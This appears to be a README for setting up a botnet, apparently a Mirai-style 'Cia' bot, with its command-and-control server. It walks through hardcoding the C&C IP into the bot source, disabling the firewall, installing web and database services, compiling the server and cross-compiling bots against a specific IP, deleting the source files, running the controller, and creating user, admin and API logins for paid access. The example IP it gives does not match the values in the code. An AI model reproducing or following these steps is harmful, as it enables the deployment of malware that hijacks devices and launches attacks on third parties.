LEAVE THE API LOGIN ALONE !!!!!!!!!!!!!!!!!!!!!

+ Botnet Setup
==================

+ Change Ip In Bot/Main.c (Line 43-47)

- Server Ip (151.32.51.61)
- Use The Numbers Between Each Dot


int hacks[] = {37};   //x.32.51.61
int hacks2[] = {49};  //151.x.51.61
int hacks3[] = {226};  //151.32.x.61
int hacks4[] = {151};  //151.32.51.x
int cia_bp = 44500; 

- Change Bot Port If You Want
-------------------------------------

+ Change Ip In Cia.c (Line 832)

This Makes The Iplookup Work
----------------------------------------------------------
yum install python-paramiko nano screen gcc perl wget lbzip unzip -y; service httpd restart; service iptables stop; sed -i s/1024/9999999/g /usr/include/bits/typesizes.h; yum -y install httpd; service httpd start; /sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT; /etc/rc.d/init.d/iptables save; yum -y install mysql-server; service mysqld start

/usr/bin/mysql_secure_installation

yum -y install php php-mysql; yum search php-; yum info NameOfTheModule; yum -y install php-mcrypt.x86_64; yum -y install php-mbstring.x86_64; service httpd restart; gcc Cia.c -o Cia -pthread; rm -rf Cia.c

chmod 777 *; python Compiler.py fff 37.49.226.13 Cia; rm -rf CIABot; rm -rf Compiler.py; rm -rf cross-compiler-*; mv iplookup.php /var/www/html

screen ./Cia BP 50 CNCPort

------------------------------------------------
+ Making Logins

- Regular Users
User User Reg

- Admin Users
User User admin

- API Logins
API 123 API

